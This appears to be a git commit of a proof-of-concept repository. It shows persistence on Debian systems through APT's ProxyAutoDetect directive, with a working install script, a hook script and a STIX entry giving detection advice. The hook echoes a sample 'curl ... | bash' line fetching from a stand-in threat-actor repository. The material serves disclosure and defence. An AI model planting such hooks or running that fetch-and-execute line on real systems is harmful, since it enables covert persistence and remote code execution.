first commit
This commit is contained in:
65
README.md
Normal file
65
README.md
Normal file
@@ -0,0 +1,65 @@
|
|||||||
|
# APT ProxyAutoDetect Persistence (PoC)
|
||||||
|
|
||||||
|
This repository demonstrates a technique for achieving execution and persistence by abusing an **undocumented feature** in the Advanced Packaging Tool (APT) on Debian-based Linux systems.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🔍 Technique Summary
|
||||||
|
|
||||||
|
APT supports an undocumented config directive:
|
||||||
|
|
||||||
|
Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";
|
||||||
|
|
||||||
|
If placed in a file inside `/etc/apt/apt.conf.d/`, APT will execute the specified binary whenever it attempts to access an HTTP repository (e.g., during `apt update`, `apt install`, etc.).
|
||||||
|
|
||||||
|
- `stdout` of the binary is treated as the proxy URL.
|
||||||
|
- `stderr` is shown to the user but ignored.
|
||||||
|
- No arguments are allowed — only absolute binary paths.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🎯 Use Cases
|
||||||
|
|
||||||
|
- **Persistence**: Binary is run every time APT is used, including via automated scripts or cron.
|
||||||
|
- **Execution**: Runs code covertly under a legitimate process tree (`apt` → custom binary).
|
||||||
|
- **Defense Evasion**: Doesn’t rely on systemd, cron, or shell profile files.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## ⚙️ Demo Setup
|
||||||
|
|
||||||
|
1. Install the config and script:
|
||||||
|
|
||||||
|
# This copies the config and shell script to /etc/apt/apt.conf.d/
|
||||||
|
```
|
||||||
|
sudo ./install.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Run `apt update`:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt update
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🧬 MITRE ATT&CK Mapping
|
||||||
|
|
||||||
|
| Tactic | Technique |
|
||||||
|
|-----------------|------------------------------------------------|
|
||||||
|
| Persistence | [T1546] Event Triggered Execution |
|
||||||
|
| Execution | [T1546.008] Application Shimming (analogous) |
|
||||||
|
| Defense Evasion | [T1565.001] Stored Data Manipulation |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 📩 Disclosure
|
||||||
|
|
||||||
|
This issue has been reported to the MITRE ATT&CK team for inclusion as a technique or sub-technique.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🔐 Author
|
||||||
|
|
||||||
|
Phillip Tarrant
|
||||||
|
[https://www.linkedin.com/in/phillip-tarrant-cyber/](https://www.linkedin.com/in/phillip-tarrant-cyber/)
|
||||||
2
poc/30detectproxy
Normal file
2
poc/30detectproxy
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
// Demonstration of ProxyAutoDetect persistence
|
||||||
|
Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";
|
||||||
10
poc/detect-http-proxy
Normal file
10
poc/detect-http-proxy
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
|
||||||
|
# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
|
||||||
|
|
||||||
|
echo "http://127.0.0.1:8888" # stdout is interpreted as the proxy address
|
||||||
|
|
||||||
|
# Simulated threat actor behavior
|
||||||
|
echo "If I was a threat actor, I might do something like:" >&2
|
||||||
|
echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2
|
||||||
13
poc/install.sh
Normal file
13
poc/install.sh
Normal file
@@ -0,0 +1,13 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
set -e
|
||||||
|
|
||||||
|
BIN_PATH="$(pwd)/detect-http-proxy"
|
||||||
|
CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
|
||||||
|
|
||||||
|
echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
|
||||||
|
chmod +x detect-http-proxy
|
||||||
|
|
||||||
|
echo "[*] Copying APT config to ${CONF_PATH}"
|
||||||
|
sudo cp 30detectproxy $CONF_PATH
|
||||||
|
|
||||||
|
echo "[*] Done. Now run: sudo apt update"
|
||||||
26
stix/apt-proxyautodetect-technique.json
Normal file
26
stix/apt-proxyautodetect-technique.json
Normal file
@@ -0,0 +1,26 @@
|
|||||||
|
{
|
||||||
|
"type": "attack-pattern",
|
||||||
|
"spec_version": "2.1",
|
||||||
|
"id": "attack-pattern--4cba5eeb-0031-47d3-9390-9f4fa6b57f88",
|
||||||
|
"created": "2025-06-20T00:00:00Z",
|
||||||
|
"modified": "2025-06-20T00:00:00Z",
|
||||||
|
"name": "APT ProxyAutoDetect Abuse for Execution",
|
||||||
|
"description": "Adversaries may abuse the undocumented Acquire::http::ProxyAutoDetect directive in APT by placing a config file that points to a local binary. This binary is executed whenever APT accesses an HTTP repository, allowing for stealthy persistence and execution.",
|
||||||
|
"x_mitre_platforms": ["Linux"],
|
||||||
|
"x_mitre_tactics": ["persistence", "execution", "defense-evasion"],
|
||||||
|
"x_mitre_permissions_required": ["root"],
|
||||||
|
"x_mitre_data_sources": [
|
||||||
|
"Process monitoring",
|
||||||
|
"File monitoring",
|
||||||
|
"Command execution"
|
||||||
|
],
|
||||||
|
"kill_chain_phases": [
|
||||||
|
{
|
||||||
|
"kill_chain_name": "mitre-attack",
|
||||||
|
"phase_name": "persistence"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"x_mitre_detection": "Monitor /etc/apt/apt.conf.d/ for unusual files. Look for Acquire::http::ProxyAutoDetect values pointing to local binaries. Detect apt-spawned processes that are not part of expected behavior.",
|
||||||
|
"x_mitre_version": "1.0",
|
||||||
|
"x_mitre_contributors": ["Phillip John Tarrant"]
|
||||||
|
}
|
||||||
Reference in New Issue
Block a user